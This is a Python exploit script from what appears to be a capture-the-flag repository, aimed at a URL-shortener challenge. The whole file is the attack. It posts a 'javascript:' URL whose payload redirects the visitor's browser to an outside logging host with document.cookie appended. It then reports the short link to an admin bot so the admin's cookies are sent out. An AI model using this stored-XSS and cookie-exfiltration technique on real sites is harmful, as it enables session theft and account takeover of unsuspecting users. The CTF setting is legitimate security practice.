Files
ctf/2025/catthegrey/ezpz/dist-oops/exploit.py
2025-06-06 03:13:31 +02:00

36 lines
993 B
Python

import requests
from bs4 import BeautifulSoup
LOCAL = False
if LOCAL:
TARGET = "http://localhost:33001/"
else:
TARGET = "http://challs2.nusgreyhats.org:33001/" # Change this to actual challenge
MALICIOUS_SERVER = "https://oops.cato447.de"
CALLBACK = f"{MALICIOUS_SERVER}/log"
payload_url = "javascript:window.location.replace(`https://oops.cato447.de/log?c=` + document.cookie)"
print("[*] Submitting payload...")
res = requests.post(f"{TARGET}/", data={"original_url": payload_url})
assert res.ok
soup = BeautifulSoup(res.text, "html.parser")
short_input = soup.find("input", {"id": "shortenedUrl"})
assert short_input, "Shortened URL input not found"
short_url = short_input["value"]
print(f"[+] Short URL: {short_url}")
print("[*] Submitting short url...")
print("[*] Reporting...")
report = requests.post(f"{TARGET}/report", data={"submit_id": short_url})
if report.ok:
print("[+] Reported to admin — wait for callback!")
else:
print("[-] Reporting failed.")